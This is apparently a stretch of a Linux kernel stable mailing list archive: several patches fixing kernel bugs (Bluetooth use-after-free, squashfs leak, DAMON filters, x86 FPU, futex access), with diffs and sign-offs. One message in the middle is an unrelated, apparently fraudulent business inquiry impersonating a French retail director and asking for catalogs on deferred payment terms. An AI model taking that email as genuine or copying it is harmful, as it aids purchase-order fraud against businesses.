!pmd_none(dst_pmdval)) {
- struct folio *folio = pmd_folio(*src_pmd);
+ /* Can be a migration entry */
+ if (pmd_present(*src_pmd)) {
+ struct folio *folio = pmd_folio(*src_pmd);
- if (!folio || (!is_huge_zero_folio(folio) &&
- !PageAnonExclusive(&folio->page))) {
- spin_unlock(ptl);
- err = -EBUSY;
- break;
+ if (!is_huge_zero_folio(folio) &&
+ !PageAnonExclusive(&folio->page)) {
+ spin_unlock(ptl);
+ err = -EBUSY;
+ break;
+ }
}
spin_unlock(ptl);
_
Patches currently in -mm which might be from surenb(a)google.com are
mm-limit-the-scope-of-vma_start_read.patch
mm-change-vma_start_read-to-drop-rcu-lock-on-failure.patch
selftests-proc-test-procmap_query-ioctl-while-vma-is-concurrently-modified.patch
fs-proc-task_mmu-factor-out-proc_maps_private-fields-used-by-procmap_query.patch
fs-proc-task_mmu-execute-procmap_query-ioctl-under-per-vma-locks.patch
commit 5af1f84ed13a416297ab9ced7537f4d5ae7f329a upstream.
Connections may be cleanup while waiting for the commands to complete so
this attempts to check if the connection handle remains valid in case of
errors that would lead to call hci_conn_failed:
BUG: KASAN: slab-use-after-free in hci_conn_failed+0x1f/0x160
Read of size 8 at addr ffff888001376958 by task kworker/u3:0/52
CPU: 0 PID: 52 Comm: kworker/u3:0 Not tainted
6.5.0-rc1-00527-g2dfe76d58d3a #5615
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS
1.16.2-1.fc38 04/01/2014
Workqueue: hci0 hci_cmd_sync_work
Call Trace:
<TASK>
dump_stack_lvl+0x1d/0x70
print_report+0xce/0x620
? __virt_addr_valid+0xd4/0x150
? hci_conn_failed+0x1f/0x160
kasan_report+0xd1/0x100
? hci_conn_failed+0x1f/0x160
hci_conn_failed+0x1f/0x160
hci_abort_conn_sync+0x237/0x360
Signed-off-by: Luiz Augusto von Dentz <luiz.von.dentz(a)intel.com>
Signed-off-by: Sumanth Gavini <sumanth.gavini(a)yahoo.com>
---
net/bluetooth/hci_sync.c | 43 +++++++++++++++++++++++++++-------------
1 file changed, 29 insertions(+), 14 deletions(-)
diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
index 3f905ee4338f..acff47da799a 100644
--- a/net/bluetooth/hci_sync.c
+++ b/net/bluetooth/hci_sync.c
@@ -5525,31 +5525,46 @@ static int hci_reject_conn_sync(struct hci_dev *hdev, struct hci_conn *conn,
int hci_abort_conn_sync(struct hci_dev *hdev, struct hci_conn *conn, u8 reason)
{
- int err;
+ int err = 0;
+ u16 handle = conn->handle;
switch (conn->state) {
case BT_CONNECTED:
case BT_CONFIG:
- return hci_disconnect_sync(hdev, conn, reason);
+ err = hci_disconnect_sync(hdev, conn, reason);
+ break;
case BT_CONNECT:
err = hci_connect_cancel_sync(hdev, conn);
- /* Cleanup hci_conn object if it cannot be cancelled as it
- * likelly means the controller and host stack are out of sync.
- */
- if (err) {
- hci_dev_lock(hdev);
- hci_conn_failed(conn, err);
- hci_dev_unlock(hdev);
- }
- return err;
+ break;
case BT_CONNECT2:
- return hci_reject_conn_sync(hdev, conn, reason);
+ err = hci_reject_conn_sync(hdev, conn, reason);
+ break;
default:
conn->state = BT_CLOSED;
- break;
+ return 0;
}
- return 0;
+ /* Cleanup hci_conn object if it cannot be cancelled as it
+ * likelly means the controller and host stack are out of sync
+ * or in case of LE it was still scanning so it can be cleanup
+ * safely.
+ */
+ if (err) {
+ struct hci_conn *c;
+
+ /* Check if the connection hasn't been cleanup while waiting
+ * commands to complete.
+ */
+ c = hci_conn_hash_lookup_handle(hdev, handle);
+ if (!c || c != conn)
+ return 0;
+
+ hci_dev_lock(hdev);
+ hci_conn_failed(conn, err);
+ hci_dev_unlock(hdev);
+ }
+
+ return err;
}
static int hci_disconnect_all_sync(struct hci_dev *hdev, u8 reason)
--
2.43.0
The patch titled
Subject: init: handle bootloader identifier in kernel parameters
has been added to the -mm mm-nonmm-unstable branch. Its filename is
init-handle-bootloader-identifier-in-kernel-parameters.patch
This patch will shortly appear at
https://git.kernel.org/pub/scm/linux/kernel/git/akpm/25-new.git/tree/patche…
This patch will later appear in the mm-nonmm-unstable branch at
git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
Before you just go and hit "reply", please:
a) Consider who else should be cc'ed
b) Prefer to cc a suitable mailing list as well
c) Ideally: find the original patch on the mailing list and do a
reply-to-all to that, adding suitable additional cc's
*** Remember to use Documentation/process/submit-checklist.rst when testing your code ***
The -mm tree is included into linux-next via the mm-everything
branch at git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
and is updated there every 2-3 working days
------------------------------------------------------
From: Huacai Chen <chenhuacai(a)loongson.cn>
Subject: init: handle bootloader identifier in kernel parameters
Date: Mon, 21 Jul 2025 18:13:43 +0800
BootLoader (Grub, LILO, etc) may pass an identifier such as "BOOT_IMAGE=
/boot/vmlinuz-x.y.z" to kernel parameters. But these identifiers are not
recognized by the kernel itself so will be passed to user space. However
user space init program also doesn't recognized it.
KEXEC/KDUMP (kexec-tools) may also pass an identifier such as "kexec" on
some architectures.
We cannot change BootLoader's behavior, because this behavior exists for
many years, and there are already user space programs search BOOT_IMAGE=
in /proc/cmdline to obtain the kernel image locations:
https://github.com/linuxdeepin/deepin-ab-recovery/blob/master/util.go
(search getBootOptions)
https://github.com/linuxdeepin/deepin-ab-recovery/blob/master/main.go
(search getKernelReleaseWithBootOption)
So the the best way is handle (ignore) it by the kernel itself, which can
avoid such boot warnings (if we use something like init=/bin/bash,
bootloader identifier can even cause a crash):
Kernel command line: BOOT_IMAGE=(hd0,1)/vmlinuz-6.x root=/dev/sda3 ro console=tty
Unknown kernel command line parameters "BOOT_IMAGE=(hd0,1)/vmlinuz-6.x", will be passed to user space.
Link: https://lkml.kernel.org/r/20250721101343.3283480-1-chenhuacai@loongson.cn
Signed-off-by: Huacai Chen <chenhuacai(a)loongson.cn>
Cc: Al Viro <viro(a)zeniv.linux.org.uk>
Cc: Christian Brauner <brauner(a)kernel.org>
Cc: Jan Kara <jack(a)suse.cz>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
init/main.c | 12 ++++++++++++
1 file changed, 12 insertions(+)
--- a/init/main.c~init-handle-bootloader-identifier-in-kernel-parameters
+++ a/init/main.c
@@ -544,6 +544,12 @@ static int __init unknown_bootoption(cha
const char *unused, void *arg)
{
size_t len = strlen(param);
+ /*
+ * Well-known bootloader identifiers:
+ * 1. LILO/Grub pass "BOOT_IMAGE=...";
+ * 2. kexec/kdump (kexec-tools) pass "kexec".
+ */
+ const char *bootloader[] = { "BOOT_IMAGE=", "kexec", NULL };
/* Handle params aliased to sysctls */
if (sysctl_is_alias(param))
@@ -551,6 +557,12 @@ static int __init unknown_bootoption(cha
repair_env_string(param, val);
+ /* Handle bootloader identifier */
+ for (int i = 0; bootloader[i]; i++) {
+ if (!strncmp(param, bootloader[i], strlen(bootloader[i])))
+ return 0;
+ }
+
/* Handle obsolete-style parameters */
if (obsolete_checksetup(param))
return 0;
_
Patches currently in -mm which might be from chenhuacai(a)loongson.cn are
init-handle-bootloader-identifier-in-kernel-parameters.patch
The patch titled
Subject: mm/damon/core: fix commit_ops_filters by using correct nth function
has been added to the -mm mm-hotfixes-unstable branch. Its filename is
mm-damon-core-fix-commit_ops_filters-by-using-correct-nth-function.patch
This patch will shortly appear at
https://git.kernel.org/pub/scm/linux/kernel/git/akpm/25-new.git/tree/patche…
This patch will later appear in the mm-hotfixes-unstable branch at
git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
Before you just go and hit "reply", please:
a) Consider who else should be cc'ed
b) Prefer to cc a suitable mailing list as well
c) Ideally: find the original patch on the mailing list and do a
reply-to-all to that, adding suitable additional cc's
*** Remember to use Documentation/process/submit-checklist.rst when testing your code ***
The -mm tree is included into linux-next via the mm-everything
branch at git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
and is updated there every 2-3 working days
------------------------------------------------------
From: Sang-Heon Jeon <ekffu200098(a)gmail.com>
Subject: mm/damon/core: fix commit_ops_filters by using correct nth function
Date: Sun, 10 Aug 2025 21:42:01 +0900
damos_commit_ops_filters() incorrectly uses damos_nth_filter() which
iterates core_filters. As a result, performing a commit unintentionally
corrupts ops_filters.
Add damos_nth_ops_filter() which iterates ops_filters. Use this function
to fix issues caused by wrong iteration.
Link: https://lkml.kernel.org/r/20250810124201.15743-1-ekffu200098@gmail.com
Fixes: 3607cc590f18 ("mm/damon/core: support committing ops_filters") # 6.15.x
Signed-off-by: Sang-Heon Jeon <ekffu200098(a)gmail.com>
Reviewed-by: SeongJae Park <sj(a)kernel.org>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
mm/damon/core.c | 14 +++++++++++++-
1 file changed, 13 insertions(+), 1 deletion(-)
--- a/mm/damon/core.c~mm-damon-core-fix-commit_ops_filters-by-using-correct-nth-function
+++ a/mm/damon/core.c
@@ -845,6 +845,18 @@ static struct damos_filter *damos_nth_fi
return NULL;
}
+static struct damos_filter *damos_nth_ops_filter(int n, struct damos *s)
+{
+ struct damos_filter *filter;
+ int i = 0;
+
+ damos_for_each_ops_filter(filter, s) {
+ if (i++ == n)
+ return filter;
+ }
+ return NULL;
+}
+
static void damos_commit_filter_arg(
struct damos_filter *dst, struct damos_filter *src)
{
@@ -908,7 +920,7 @@ static int damos_commit_ops_filters(stru
int i = 0, j = 0;
damos_for_each_ops_filter_safe(dst_filter, next, dst) {
- src_filter = damos_nth_filter(i++, src);
+ src_filter = damos_nth_ops_filter(i++, src);
if (src_filter)
damos_commit_filter(dst_filter, src_filter);
else
_
Patches currently in -mm which might be from ekffu200098(a)gmail.com are
mm-damon-core-fix-commit_ops_filters-by-using-correct-nth-function.patch
mm-damon-update-expired-description-of-damos_action.patch
docs-mm-damon-design-fix-typo-s-sz_trtied-sz_tried.patch
--
Hi,
PERDIS SUPER U is a leading retail group in France with numerous
outlets across the country. After reviewing your company profile and
products, we’re very interested in establishing a long-term partnership.
Kindly share your product catalog or website so we can review your
offerings and pricing. We are ready to place orders and begin
cooperation.Please note: Our payment terms are SWIFT, 14 days after
delivery.
Looking forward to your response.
Best regards,
Dominique Schelcher
Director, PERDIS SUPER U
RUE DE SAVOIE, 45600 SAINT-PÈRE-SUR-LOIRE
VAT: FR65380071464
www.magasins-u.com
The patch titled
Subject: squashfs: fix memory leak in squashfs_fill_super
has been added to the -mm mm-hotfixes-unstable branch. Its filename is
squashfs-fix-memory-leak-in-squashfs_fill_super.patch
This patch will shortly appear at
https://git.kernel.org/pub/scm/linux/kernel/git/akpm/25-new.git/tree/patche…
This patch will later appear in the mm-hotfixes-unstable branch at
git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
Before you just go and hit "reply", please:
a) Consider who else should be cc'ed
b) Prefer to cc a suitable mailing list as well
c) Ideally: find the original patch on the mailing list and do a
reply-to-all to that, adding suitable additional cc's
*** Remember to use Documentation/process/submit-checklist.rst when testing your code ***
The -mm tree is included into linux-next via the mm-everything
branch at git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
and is updated there every 2-3 working days
------------------------------------------------------
From: Phillip Lougher <phillip(a)squashfs.org.uk>
Subject: squashfs: fix memory leak in squashfs_fill_super
Date: Mon, 11 Aug 2025 23:37:40 +0100
If sb_min_blocksize returns 0, squashfs_fill_super exits without freeing
allocated memory (sb->s_fs_info).
Fix this by moving the call to sb_min_blocksize to before memory is
allocated.
Link: https://lkml.kernel.org/r/20250811223740.110392-1-phillip@squashfs.org.uk
Fixes: 734aa85390ea ("Squashfs: check return result of sb_min_blocksize")
Signed-off-by: Phillip Lougher <phillip(a)squashfs.org.uk>
Reported-by: Scott GUO <scottzhguo(a)tencent.com>
Closes: https://lore.kernel.org/all/20250811061921.3807353-1-scott_gzh@163.com
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
fs/squashfs/super.c | 14 +++++++-------
1 file changed, 7 insertions(+), 7 deletions(-)
--- a/fs/squashfs/super.c~squashfs-fix-memory-leak-in-squashfs_fill_super
+++ a/fs/squashfs/super.c
@@ -187,10 +187,15 @@ static int squashfs_fill_super(struct su
unsigned short flags;
unsigned int fragments;
u64 lookup_table_start, xattr_id_table_start, next_table;
- int err;
+ int err, devblksize = sb_min_blocksize(sb, SQUASHFS_DEVBLK_SIZE);
TRACE("Entered squashfs_fill_superblock\n");
+ if (!devblksize) {
+ errorf(fc, "squashfs: unable to set blocksize\n");
+ return -EINVAL;
+ }
+
sb->s_fs_info = kzalloc(sizeof(*msblk), GFP_KERNEL);
if (sb->s_fs_info == NULL) {
ERROR("Failed to allocate squashfs_sb_info\n");
@@ -201,12 +206,7 @@ static int squashfs_fill_super(struct su
msblk->panic_on_errors = (opts->errors == Opt_errors_panic);
- msblk->devblksize = sb_min_blocksize(sb, SQUASHFS_DEVBLK_SIZE);
- if (!msblk->devblksize) {
- errorf(fc, "squashfs: unable to set blocksize\n");
- return -EINVAL;
- }
-
+ msblk->devblksize = devblksize;
msblk->devblksize_log2 = ffz(~msblk->devblksize);
mutex_init(&msblk->meta_index_mutex);
_
Patches currently in -mm which might be from phillip(a)squashfs.org.uk are
squashfs-fix-memory-leak-in-squashfs_fill_super.patch
Hi,
To Fix CVE-2021-47498 b4459b11e840 is required, but it has a dependency
on e2118b3c3d94 ("rearrange core declarations for extended use
from dm-zone.c"). Therefore backported both patches for v5.10.
Thanks,
Shivani
Shivani Agarwal (2):
dm: rearrange core declarations for extended use from dm-zone.c
dm rq: don't queue request to blk-mq during DM suspend
drivers/md/dm-core.h | 52 ++++++++++++++++++++++++++++++++++++++
drivers/md/dm-rq.c | 8 ++++++
drivers/md/dm.c | 59 ++++++--------------------------------------
3 files changed, 67 insertions(+), 52 deletions(-)
--
2.40.4
So we've had this regression in 9p for.. almost a year, which is way too
long, but there was no "easy" reproducer until yesterday (thank you
again!!)
It turned out to be a bug with iov_iter on folios,
iov_iter_get_pages_alloc2() would advance the iov_iter correctly up to
the end edge of a folio and the later copy_to_iter() fails on the
iterate_folioq() bug.
Happy to consider alternative ways of fixing this, now there's a
reproducer it's all much clearer; for the bug to be visible we basically
need to make and IO with non-contiguous folios in the iov_iter which is
not obvious to test with synthetic VMs, with size that triggers a
zero-copy read followed by a non-zero-copy read.
Signed-off-by: Dominique Martinet <asmadeus(a)codewreck.org>
---
Changes in v2:
- Fixed 'remain' being used uninitialized in iterate_folioq when going
through the goto
- s/forwarded/advanced in commit message
- Link to v1: https://lore.kernel.org/r/20250811-iot_iter_folio-v1-0-d9c223adf93c@codewre…
---
Dominique Martinet (2):
iov_iter: iterate_folioq: fix handling of offset >= folio size
iov_iter: iov_folioq_get_pages: don't leave empty slot behind
include/linux/iov_iter.h | 5 ++++-
lib/iov_iter.c | 6 +++---
2 files changed, 7 insertions(+), 4 deletions(-)
---
base-commit: 8f5ae30d69d7543eee0d70083daf4de8fe15d585
change-id: 20250811-iot_iter_folio-1b7849f88fed
Best regards,
--
Dominique Martinet <asmadeus(a)codewreck.org>
The following commit has been merged into the x86/urgent branch of tip:
Commit-ID: 31cd31c9e17ece125aad27259501a2af69ccb020
Gitweb: https://git.kernel.org/tip/31cd31c9e17ece125aad27259501a2af69ccb020
Author: Fushuai Wang <wangfushuai(a)baidu.com>
AuthorDate: Mon, 11 Aug 2025 11:50:44 -07:00
Committer: Dave Hansen <dave.hansen(a)linux.intel.com>
CommitterDate: Mon, 11 Aug 2025 13:28:07 -07:00
x86/fpu: Fix NULL dereference in avx512_status()
Problem
-------
With CONFIG_X86_DEBUG_FPU enabled, reading /proc/[kthread]/arch_status
causes a warning and a NULL pointer dereference.
This is because the AVX-512 timestamp code uses x86_task_fpu() but
doesn't check it for NULL. CONFIG_X86_DEBUG_FPU addles that function
for kernel threads (PF_KTHREAD specifically), making it return NULL.
The point of the warning was to ensure that kernel threads only access
task->fpu after going through kernel_fpu_begin()/_end(). Note: all
kernel tasks exposed in /proc have a valid task->fpu.
Solution
--------
One option is to silence the warning and check for NULL from
x86_task_fpu(). However, that warning is fairly fresh and seems like a
defense against misuse of the FPU state in kernel threads.
Instead, stop outputting AVX-512_elapsed_ms for kernel threads
altogether. The data was garbage anyway because avx512_timestamp is
only updated for user threads, not kernel threads.
If anyone ever wants to track kernel thread AVX-512 use, they can come
back later and do it properly, separate from this bug fix.
[ dhansen: mostly rewrite changelog ]
Fixes: 22aafe3bcb67 ("x86/fpu: Remove init_task FPU state dependencies, add debugging warning for PF_KTHREAD tasks")
Co-developed-by: Sohil Mehta <sohil.mehta(a)intel.com>
Signed-off-by: Sohil Mehta <sohil.mehta(a)intel.com>
Signed-off-by: Fushuai Wang <wangfushuai(a)baidu.com>
Signed-off-by: Dave Hansen <dave.hansen(a)linux.intel.com>
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/all/20250811185044.2227268-1-sohil.mehta%40intel.com
---
arch/x86/kernel/fpu/xstate.c | 19 ++++++++++---------
1 file changed, 10 insertions(+), 9 deletions(-)
diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
index 12ed75c..28e4fd6 100644
--- a/arch/x86/kernel/fpu/xstate.c
+++ b/arch/x86/kernel/fpu/xstate.c
@@ -1881,19 +1881,20 @@ long fpu_xstate_prctl(int option, unsigned long arg2)
#ifdef CONFIG_PROC_PID_ARCH_STATUS
/*
* Report the amount of time elapsed in millisecond since last AVX512
- * use in the task.
+ * use in the task. Report -1 if no AVX-512 usage.
*/
static void avx512_status(struct seq_file *m, struct task_struct *task)
{
- unsigned long timestamp = READ_ONCE(x86_task_fpu(task)->avx512_timestamp);
- long delta;
+ unsigned long timestamp;
+ long delta = -1;
- if (!timestamp) {
- /*
- * Report -1 if no AVX512 usage
- */
- delta = -1;
- } else {
+ /* AVX-512 usage is not tracked for kernel threads. Don't report anything. */
+ if (task->flags & (PF_KTHREAD | PF_USER_WORKER))
+ return;
+
+ timestamp = READ_ONCE(x86_task_fpu(task)->avx512_timestamp);
+
+ if (timestamp) {
delta = (long)(jiffies - timestamp);
/*
* Cap to LONG_MAX if time difference > LONG_MAX
From: Jean-Baptiste Maneyrol <jean-baptiste.maneyrol(a)tdk.com>
Temperature sensor returns the temperature of the mechanical parts
of the chip. If both accel and gyro are off, temperature sensor is
also automatically turned off and return invalid data.
In this case, returning EBUSY error code is better then EINVAL and
indicates userspace that it needs to retry reading temperature in
another context.
Fixes: bc3eb0207fb5 ("iio: imu: inv_icm42600: add temperature sensor support")
Signed-off-by: Jean-Baptiste Maneyrol <jean-baptiste.maneyrol(a)tdk.com>
Cc: stable(a)vger.kernel.org
---
drivers/iio/imu/inv_icm42600/inv_icm42600_temp.c | 6 +++++-
1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/drivers/iio/imu/inv_icm42600/inv_icm42600_temp.c b/drivers/iio/imu/inv_icm42600/inv_icm42600_temp.c
index 8b15afca498cb5dfa7e056a60d3c78e419f11b29..1756f3d07049a26038776a35d9242f3dd1320354 100644
--- a/drivers/iio/imu/inv_icm42600/inv_icm42600_temp.c
+++ b/drivers/iio/imu/inv_icm42600/inv_icm42600_temp.c
@@ -32,8 +32,12 @@ static int inv_icm42600_temp_read(struct inv_icm42600_state *st, s16 *temp)
goto exit;
*temp = (s16)be16_to_cpup(raw);
+ /*
+ * Temperature data is invalid if both accel and gyro are off.
+ * Return EBUSY in this case.
+ */
if (*temp == INV_ICM42600_DATA_INVALID)
- ret = -EINVAL;
+ ret = -EBUSY;
exit:
mutex_unlock(&st->lock);
---
base-commit: 6408dba154079656d069a6a25fb3a8954959474c
change-id: 20250807-inv-icm42600-change-temperature-error-code-65d16a98c6e1
Best regards,
--
Jean-Baptiste Maneyrol <jean-baptiste.maneyrol(a)tdk.com>
Use 'min(len, x)' as the index instead of just 'len' to NUL-terminate
the copied 'line' string at the correct position.
Add a newline after the local variable declarations to silence a
checkpatch warning.
Cc: stable(a)vger.kernel.org
Fixes: 692d97c380c6 ("kconfig: new configuration interface (nconfig)")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
---
scripts/kconfig/nconf.gui.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/scripts/kconfig/nconf.gui.c b/scripts/kconfig/nconf.gui.c
index 7206437e784a..ec021ebd2c52 100644
--- a/scripts/kconfig/nconf.gui.c
+++ b/scripts/kconfig/nconf.gui.c
@@ -175,8 +175,9 @@ void fill_window(WINDOW *win, const char *text)
for (i = 0; i < total_lines; i++) {
char tmp[x+10];
const char *line = get_line(text, i);
- int len = get_line_length(line);
- strncpy(tmp, line, min(len, x));
+ int len = min(get_line_length(line), x);
+
+ strncpy(tmp, line, len);
tmp[len] = '\0';
mvwprintw(win, i, 0, "%s", tmp);
}
--
2.50.1
The following commit has been merged into the locking/urgent branch of tip:
Commit-ID: dfb36e4a8db0cd56f92d4cb445f54e85a9b40897
Gitweb: https://git.kernel.org/tip/dfb36e4a8db0cd56f92d4cb445f54e85a9b40897
Author: Waiman Long <longman(a)redhat.com>
AuthorDate: Mon, 11 Aug 2025 10:11:47 -04:00
Committer: Thomas Gleixner <tglx(a)linutronix.de>
CommitterDate: Mon, 11 Aug 2025 17:53:21 +02:00
futex: Use user_write_access_begin/_end() in futex_put_value()
Commit cec199c5e39b ("futex: Implement FUTEX2_NUMA") introduced the
futex_put_value() helper to write a value to the given user
address.
However, it uses user_read_access_begin() before the write. For
architectures that differentiate between read and write accesses, like
PowerPC, futex_put_value() fails with -EFAULT.
Fix that by using the user_write_access_begin/user_write_access_end() pair
instead.
Fixes: cec199c5e39b ("futex: Implement FUTEX2_NUMA")
Signed-off-by: Waiman Long <longman(a)redhat.com>
Signed-off-by: Thomas Gleixner <tglx(a)linutronix.de>
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/all/20250811141147.322261-1-longman@redhat.com
---
kernel/futex/futex.h | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/kernel/futex/futex.h b/kernel/futex/futex.h
index c74eac5..2cd5709 100644
--- a/kernel/futex/futex.h
+++ b/kernel/futex/futex.h
@@ -319,13 +319,13 @@ static __always_inline int futex_put_value(u32 val, u32 __user *to)
{
if (can_do_masked_user_access())
to = masked_user_access_begin(to);
- else if (!user_read_access_begin(to, sizeof(*to)))
+ else if (!user_write_access_begin(to, sizeof(*to)))
return -EFAULT;
unsafe_put_user(val, to, Efault);
- user_read_access_end();
+ user_write_access_end();
return 0;
Efault:
- user_read_access_end();
+ user_write_access_end();
return -EFAULT;
}
There is a fix 17ba9cde11c2bfebbd70867b0a2ac4a22e573379
introduced in v6.8 to fix the problem introduced by
the original fix 66951d98d9bf45ba25acf37fe0747253fafdf298,
and they together fix the CVE-2024-26661.
Since this is the first time I submit the changes on vulns project,
not sure if the changes in my patch are exact, @Greg, please point
out the problems if there are and I will fix them.
Thanks!
Qingfeng Hao (1):
CVE-2024-26661: change the sha1 of the cve id
cve/published/2024/CVE-2024-26661.dyad | 6 ++--
cve/published/2024/CVE-2024-26661.json | 46 ++------------------------
cve/published/2024/CVE-2024-26661.sha1 | 2 +-
3 files changed, 5 insertions(+), 49 deletions(-)
--
2.34.1
All the other ref clocks provided by this driver have the bi_tcxo
as parent. The eDP refclk is the only one without a parent, leading
to reporting its rate as 0. So set its parent to bi_tcxo, just like
the rest of the refclks.
Cc: stable(a)vger.kernel.org # v6.9
Fixes: 06aff116199c ("clk: qcom: Add TCSR clock driver for x1e80100")
Signed-off-by: Abel Vesa <abel.vesa(a)linaro.org>
---
drivers/clk/qcom/tcsrcc-x1e80100.c | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/drivers/clk/qcom/tcsrcc-x1e80100.c b/drivers/clk/qcom/tcsrcc-x1e80100.c
index ff61769a08077e916157a03c789ab3d5b0c090f6..a367e1f55622d990929984facb62185b551d6c50 100644
--- a/drivers/clk/qcom/tcsrcc-x1e80100.c
+++ b/drivers/clk/qcom/tcsrcc-x1e80100.c
@@ -29,6 +29,10 @@ static struct clk_branch tcsr_edp_clkref_en = {
.enable_mask = BIT(0),
.hw.init = &(const struct clk_init_data) {
.name = "tcsr_edp_clkref_en",
+ .parent_data = &(const struct clk_parent_data){
+ .index = DT_BI_TCXO_PAD,
+ },
+ .num_parents = 1,
.ops = &clk_branch2_ops,
},
},
---
base-commit: 79fb37f39b77bbf9a56304e9af843cd93a7a1916
change-id: 20250730-clk-qcom-tcsrcc-x1e80100-parent-edp-refclk-8b17a56f050a
Best regards,
--
Abel Vesa <abel.vesa(a)linaro.org>
On Mon, 11 Aug 2025 at 16:18, Sasha Levin <sashal(a)kernel.org> wrote:
>
> This is a note to let you know that I've just added the patch titled
>
> ARM: s3c/gpio: complete the conversion to new GPIO value setters
>
> to the 6.16-stable tree which can be found at:
> http://www.kernel.org/git/?p=linux/kernel/git/stable/stable-queue.git;a=sum…
>
> The filename of the patch is:
> arm-s3c-gpio-complete-the-conversion-to-new-gpio-val.patch
> and it can be found in the queue-6.16 subdirectory.
>
> If you, or anyone else, feels it should not be added to the stable tree,
> please let <stable(a)vger.kernel.org> know about it.
>
This is not something we should backport. This is a refactoring targeting v6.17.
Bartosz
>
>
> commit c09ce1148e4748b856b6d13a8b9fa568a1e687a2
> Author: Bartosz Golaszewski <bartosz.golaszewski(a)linaro.org>
> Date: Wed Jul 30 09:14:43 2025 +0200
>
> ARM: s3c/gpio: complete the conversion to new GPIO value setters
>
> [ Upstream commit 3dca3d51b933beb3f35a60472ed2110d1bd7046a ]
>
> Commit fb52f3226cab ("ARM: s3c/gpio: use new line value setter
> callbacks") correctly changed the assignment of the callback but missed
> the check one liner higher. Change it now too to using the recommended
> callback as the legacy one is going away soon.
>
> Fixes: fb52f3226cab ("ARM: s3c/gpio: use new line value setter callbacks")
> Signed-off-by: Bartosz Golaszewski <bartosz.golaszewski(a)linaro.org>
> Signed-off-by: Arnd Bergmann <arnd(a)arndb.de>
> Signed-off-by: Sasha Levin <sashal(a)kernel.org>
>
> diff --git a/arch/arm/mach-s3c/gpio-samsung.c b/arch/arm/mach-s3c/gpio-samsung.c
> index 206a492fbaf5..3ee4ad969cc2 100644
> --- a/arch/arm/mach-s3c/gpio-samsung.c
> +++ b/arch/arm/mach-s3c/gpio-samsung.c
> @@ -516,7 +516,7 @@ static void __init samsung_gpiolib_add(struct samsung_gpio_chip *chip)
> gc->direction_input = samsung_gpiolib_2bit_input;
> if (!gc->direction_output)
> gc->direction_output = samsung_gpiolib_2bit_output;
> - if (!gc->set)
> + if (!gc->set_rv)
> gc->set_rv = samsung_gpiolib_set;
> if (!gc->get)
> gc->get = samsung_gpiolib_get;
In order to set the AMCR register, which configures the
memory-region split between ospi1 and ospi2, we need to
identify the ospi instance.
By using memory-region-names, it allows to identify the
ospi instance this memory-region belongs to.
Fixes: cad2492de91c ("arm64: dts: st: Add SPI NOR flash support on stm32mp257f-ev1 board")
Cc: stable(a)vger.kernel.org
Signed-off-by: Patrice Chotard <patrice.chotard(a)foss.st.com>
---
Changes in v3:
- Set again "Cc: <stable(a)vger.kernel.org>"
- Link to v2: https://lore.kernel.org/r/20250811-upstream_fix_dts_omm-v2-1-00ff55076bd5@f…
Changes in v2:
- Update commit message.
- Use correct memory-region-names value.
- Remove "Cc: <stable(a)vger.kernel.org>" tag as the fixed patch is not part of a LTS.
- Link to v1: https://lore.kernel.org/r/20250806-upstream_fix_dts_omm-v1-1-e68c15ed422d@f…
---
arch/arm64/boot/dts/st/stm32mp257f-ev1.dts | 1 +
1 file changed, 1 insertion(+)
diff --git a/arch/arm64/boot/dts/st/stm32mp257f-ev1.dts b/arch/arm64/boot/dts/st/stm32mp257f-ev1.dts
index 2f561ad4066544445e93db78557bc4be1c27095a..7bd8433c1b4344bb5d58193a5e6314f9ae89e0a4 100644
--- a/arch/arm64/boot/dts/st/stm32mp257f-ev1.dts
+++ b/arch/arm64/boot/dts/st/stm32mp257f-ev1.dts
@@ -197,6 +197,7 @@ &i2c8 {
&ommanager {
memory-region = <&mm_ospi1>;
+ memory-region-names = "ospi1";
pinctrl-0 = <&ospi_port1_clk_pins_a
&ospi_port1_io03_pins_a
&ospi_port1_cs0_pins_a>;
---
base-commit: 038d61fd642278bab63ee8ef722c50d10ab01e8f
change-id: 20250806-upstream_fix_dts_omm-c006b69042f1
Best regards,
--
Patrice Chotard <patrice.chotard(a)foss.st.com>
Move ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings() to
linux/pgtable.h so that they can be used outside of vmalloc and ioremap.
Cc: <stable(a)vger.kernel.org>
Fixes: 8d400913c231 ("x86/vmemmap: handle unpopulated sub-pmd ranges")
Signed-off-by: Harry Yoo <harry.yoo(a)oracle.com>
---
include/linux/pgtable.h | 16 ++++++++++++++++
include/linux/vmalloc.h | 16 ----------------
2 files changed, 16 insertions(+), 16 deletions(-)
diff --git a/include/linux/pgtable.h b/include/linux/pgtable.h
index 4c035637eeb7..ba699df6ef69 100644
--- a/include/linux/pgtable.h
+++ b/include/linux/pgtable.h
@@ -1467,6 +1467,22 @@ static inline void modify_prot_commit_ptes(struct vm_area_struct *vma, unsigned
}
#endif
+/*
+ * Architectures can set this mask to a combination of PGTBL_P?D_MODIFIED values
+ * and let generic vmalloc and ioremap code know when arch_sync_kernel_mappings()
+ * needs to be called.
+ */
+#ifndef ARCH_PAGE_TABLE_SYNC_MASK
+#define ARCH_PAGE_TABLE_SYNC_MASK 0
+#endif
+
+/*
+ * There is no default implementation for arch_sync_kernel_mappings(). It is
+ * relied upon the compiler to optimize calls out if ARCH_PAGE_TABLE_SYNC_MASK
+ * is 0.
+ */
